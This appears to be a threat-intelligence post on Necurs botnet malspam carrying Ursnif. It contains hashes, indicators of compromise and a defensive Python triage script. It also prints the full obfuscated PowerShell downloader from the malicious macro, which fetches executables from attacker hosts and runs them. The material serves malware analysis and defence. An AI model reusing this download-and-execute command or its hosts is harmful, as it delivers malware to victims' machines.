
Emerging Threats

Necurs Botnet & Banking Trojans

frtg

Cisco Talos has published an analysis of the latest malspam wave distributed by the Necurs botnet (link).

Necurs is one of the most active botnets in the world and can generate enormous volumes of spam. The emails in this campaign carry ransomware and banking trojans, specifically Ursnif, Panda Banker and Emotet.

Opening the malicious document and clicking Enable Content (which lets the embedded macro run) starts the compromise chain.

The following is a brief analysis of the Ursnif banking malware:


The malicious attachment is a .doc file named: [COMPANYNAME]_Request - [Employee Surname].doc

Opening the file and enabling content launches PowerShell with the following command line (reproduced with the obfuscated variable and filler names as observed):

  $VeZynUhagoWemyROVeJ = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("aAB0AHQAcAA6AC8ALwBjAG8AZABlAHIAbwBuAGYAbwBkAGEALgBjAG8AbQAvAGIAcgBlAGUAcABpAHQAYQBsADIANwAvAHkAeQB5AGoALgBnAGUAcgA/AHYAYQBzAHkAZwBhAHIAdQBiAD0AdwBpAHoAYQBoAG8AegBlACYAYQBhAG4AaQB4AG8AaAB1AD0AawB1AGsAJgByAGEAdABhAHgAPQBoAHkAaQB1AHMAaQBwAHUAaQBhACYAcABvAGMAYQB4AGUAbQBvAGsAPQB6AHUAJgByAGUAdwBpAHgAeQBkAGEAPQB0AGUAZAB1AHMAbwB6AGEAbQA="));
  (New-Object System.Net.WebClient).DownloadFile($VeZynUhagoWemyROVeJ, $env:APPDATA + '\valabyhuh.exe');
  Start-Process $env:APPDATA'\valabyhuh.exe';
  Write-Host "bAbYgiramOpEPY";
  $iARAPUmOPaJeS = New-Object System.Net.NetworkCredential("lUpIaaKAXuqexOGybu","lUpIaaKAXuqexOGybu").SecurePassword;
  (New-Object System.Net.WebClient).DownloadFile('http://91.210.104.247/porn.jpg', $env:APPDATA + '\stat.exe');
  Write-Host "FYFopIsYpUjurof";
  Start-Process $env:APPDATA'\stat.exe';
  $jOCOdeFOLUXALoNA = "nuqoLuSAwEjOdE","iiQOCOhERiJYsyie","qIhyGAtYlebimycuaUf","bYtURYGunUtiKe","pazuWeXOQoFIzIQUaUhe";
  Exit;

The command downloads two executables into %APPDATA% and launches each one with Start-Process. The first download URL is hidden in a Base64-encoded UTF-16LE string ([System.Text.Encoding]::Unicode); the second is a plaintext URL to a file named porn.jpg, which is saved as stat.exe. The Write-Host strings and the unused $iARAPUmOPaJeS and $jOCOdeFOLUXALoNA variables are filler. The two payloads:

  • valabyhuh.exe
    • MD5:     fa37eb66b10eb030e777af9420ffce9a
    • SHA1:   92b86fcdb6bc0fcdbb60478e41456d5b565410ce
    • SHA256: 856e8c8716fa5afac747efcd8acfe1488c703f1b8620dd567b2b7543458c5d69
  • stat.exe
    • MD5:     2ca1f87a624245db0a57bf439b71d460
    • SHA1:   2f6de1b66d8021b74ebcee0040b9a7c00b61d231
    • SHA256: 06af68780ff670177daf0d6e34918976a46f9e69787a284b8757470fb02903b3
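The downloader command above can be triaged statically, without ever running it. The following Python script is an added example, not part of the original post or of the Talos analysis: it carries a copy of the command constructed from the text above (ASCII quotes instead of the smart quotes the page rendered), decodes the Base64 blob as UTF-16LE (what PowerShell's [Text.Encoding]::Unicode means), resolves the variable used in the first DownloadFile call, and emits defanged URL -> drop-path pairs suitable for an IoC list. The regexes are written for this command's shape and would need widening for other samples.

```python
"""Static triage of the Ursnif PowerShell downloader quoted in the post.

Parses the command text to recover download URLs and drop paths.
Nothing is downloaded or executed.
"""
import base64
import re

# Constructed copy of the Base64 blob from the post, split across lines
# only for readability (chunk boundaries are on 4-character groups).
B64_BLOB = (
    "aAB0AHQAcAA6AC8ALwBjAG8AZABlAHIAbwBuAGYAbwBkAGEALgBjAG8AbQAv"
    "AGIAcgBlAGUAcABpAHQAYQBsADIANwAv"
    "AHkAeQB5AGoALgBnAGUAcgA/"
    "AHYAYQBzAHkAZwBhAHIAdQBiAD0A"
    "dwBpAHoAYQBoAG8AegBlACYA"
    "YQBhAG4AaQB4AG8AaAB1AD0A"
    "awB1AGsAJgBy"
    "AGEAdABhAHgAPQBo"
    "AHkAaQB1AHMAaQBwAHUAaQBhACYA"
    "cABvAGMAYQB4AGUAbQBvAGsAPQB6AHUAJgBy"
    "AGUAdwBpAHgAeQBkAGEAPQB0AGUAZAB1AHMAbwB6AGEAbQA="
)

# Constructed copy of the observed command with ASCII quotes.
PS_COMMAND = (
    "$VeZynUhagoWemyROVeJ = [System.Text.Encoding]::Unicode.GetString("
    '[System.Convert]::FromBase64String("' + B64_BLOB + '"));'
    "(New-Object System.Net.WebClient).DownloadFile($VeZynUhagoWemyROVeJ, "
    "$env:APPDATA + '\\valabyhuh.exe'); "
    "Start-Process $env:APPDATA'\\valabyhuh.exe';"
    'Write-Host "bAbYgiramOpEPY";'
    "$iARAPUmOPaJeS = New-Object System.Net.NetworkCredential("
    '"lUpIaaKAXuqexOGybu","lUpIaaKAXuqexOGybu").SecurePassword;'
    "(New-Object System.Net.WebClient).DownloadFile("
    "'http://91.210.104.247/porn.jpg', $env:APPDATA + '\\stat.exe'); "
    'Write-Host "FYFopIsYpUjurof";'
    "Start-Process $env:APPDATA'\\stat.exe';"
    '$jOCOdeFOLUXALoNA = "nuqoLuSAwEjOdE","iiQOCOhERiJYsyie",'
    '"qIhyGAtYlebimycuaUf","bYtURYGunUtiKe","pazuWeXOQoFIzIQUaUhe";Exit;'
)

# $var = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("..."))
B64_ASSIGN_RE = re.compile(
    r'(\$\w+)\s*=\s*\[System\.Text\.Encoding\]::Unicode\.GetString\('
    r'\[System\.Convert\]::FromBase64String\("([A-Za-z0-9+/=]+)"\)\)'
)
# DownloadFile(<$var or 'literal url'>, $env:APPDATA + '<drop name>')
DOWNLOAD_RE = re.compile(
    r"DownloadFile\(\s*(\$\w+|'[^']*')\s*,\s*\$env:APPDATA\s*\+\s*'([^']*)'\s*\)"
)


def decode_unicode_b64(blob: str) -> str:
    """PowerShell's [Text.Encoding]::Unicode is UTF-16LE, not UTF-8."""
    return base64.b64decode(blob).decode("utf-16-le")


def resolve_variables(command: str) -> dict:
    """Map every Base64/UTF-16LE-assigned variable to its decoded string."""
    return {name: decode_unicode_b64(blob)
            for name, blob in B64_ASSIGN_RE.findall(command)}


def extract_downloads(command: str) -> list:
    """Return (url, drop_path) pairs for each WebClient.DownloadFile call."""
    variables = resolve_variables(command)
    pairs = []
    for source, drop_name in DOWNLOAD_RE.findall(command):
        if source.startswith("$"):
            url = variables.get(source, source)   # leave unresolved names as-is
        else:
            url = source.strip("'")
        pairs.append((url, "%APPDATA%" + drop_name))
    return pairs


def defang(url: str) -> str:
    """hxxp:// and [.] in the host so the IoC cannot be clicked by accident."""
    scheme, sep, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + sep + host.replace(".", "[.]") + slash + path


def triage(command: str) -> list:
    """Defanged one-line summaries, one per download/drop pair."""
    return [f"{defang(url)} -> {drop}" for url, drop in extract_downloads(command)]


if __name__ == "__main__":
    for line in triage(PS_COMMAND):
        print(line)
```

Running it prints the two defanged URL -> drop-path pairs: the first resolves the Base64 blob to a URL on coderonfoda[.]com that is saved as valabyhuh.exe, the second is the plaintext fetch of 91[.]210[.]104[.]247/porn.jpg saved as stat.exe. Decoding the blob with UTF-8 instead of UTF-16LE would yield a string full of NUL bytes, which is the usual sign that a sample used [Text.Encoding]::Unicode.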

Network traffic generated:

Indicators of Compromise:

  • http://91.210.104.247/emotet.txt (GrandSoft EK related)
  • http://45.227.252.241/linnealva/kitea.dlm